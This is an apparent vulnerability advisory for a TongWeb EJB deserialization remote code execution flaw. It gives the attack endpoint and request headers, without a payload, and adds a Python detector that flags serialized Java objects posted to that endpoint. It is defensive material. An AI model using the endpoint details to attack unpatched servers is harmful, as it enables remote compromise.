TongTech Application Server (TongWeb) EJB Deserialization Remote Code Execution Vulnerability

Date: 2025-11-13 13:50:02 | Affected software: TongTech Application Server (TongWeb) | PoC: public

Vulnerability description

TongWeb Application Server is a standards-compliant, secure, highly available and feature-rich enterprise application server that gives enterprise applications convenient development, flexible on-demand deployment, rich runtime monitoring and efficient, easy management. In November 2025, TongTech released a patch fixing a remote code execution vulnerability discovered by security researchers at Chaitin Tech (长亭科技). When TongWeb processes EJB protocol data it does not validate the request data, so an attacker who submits crafted serialized data can execute arbitrary code on the server. Because the vulnerability is easy to exploit, affected users are advised to apply the security patch promptly.

PoC code

POST /ejbserver/ejb HTTP/1.1
Content-Type: application/octet-stream

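As an added detection example (not part of this advisory and not TongWeb's own code), the Python below inspects raw HTTP requests and flags those that deliver what looks like a Java serialization stream to the /ejbserver/ejb endpoint shown in the PoC. It assumes the decoded request body is a raw Java serialization stream, which always starts with the magic bytes AC ED 00 05; the host name and the sample bodies are constructed for the demonstration.

```python
# Added example (not from the advisory): flag HTTP requests that look like
# Java-serialized payloads sent to the TongWeb EJB endpoint named on this page.
# Assumption: the endpoint receives a raw Java serialization stream, which
# begins with the magic bytes AC ED 00 05 (STREAM_MAGIC + STREAM_VERSION).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
EJB_PATH = "/ejbserver/ejb"  # endpoint from the advisory's PoC request


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_ejb_request(raw: bytes) -> dict:
    """Return which indicators matched for one request plus an overall verdict."""
    method, path, headers, body = parse_http_request(raw)
    indicators = {
        "post_to_ejb_endpoint": method == "POST" and path == EJB_PATH,
        "octet_stream_body": headers.get("content-type", "").startswith("application/octet-stream"),
        "java_serialization_magic": body.startswith(JAVA_STREAM_MAGIC),
    }
    # A serialized Java object posted to the EJB endpoint is the pattern to alert on.
    indicators["suspicious"] = indicators["post_to_ejb_endpoint"] and indicators["java_serialization_magic"]
    return indicators


# Constructed sample traffic: the body is only the stream header plus filler bytes,
# not a real gadget chain; it exists purely to exercise the detector.
SUSPICIOUS_REQUEST = (
    b"POST /ejbserver/ejb HTTP/1.1\r\n"
    b"Host: tongweb.example.internal\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n" + JAVA_STREAM_MAGIC + b"\x73\x72" + b"\x00" * 16
)
BENIGN_REQUEST = (
    b"GET /console/ HTTP/1.1\r\n"
    b"Host: tongweb.example.internal\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for name, req in (("suspicious", SUSPICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, inspect_ejb_request(req))
```

The same check can be applied to request bodies captured by a WAF or reverse proxy in front of TongWeb; a hit on an unpatched host warrants treating it as a potential exploitation attempt.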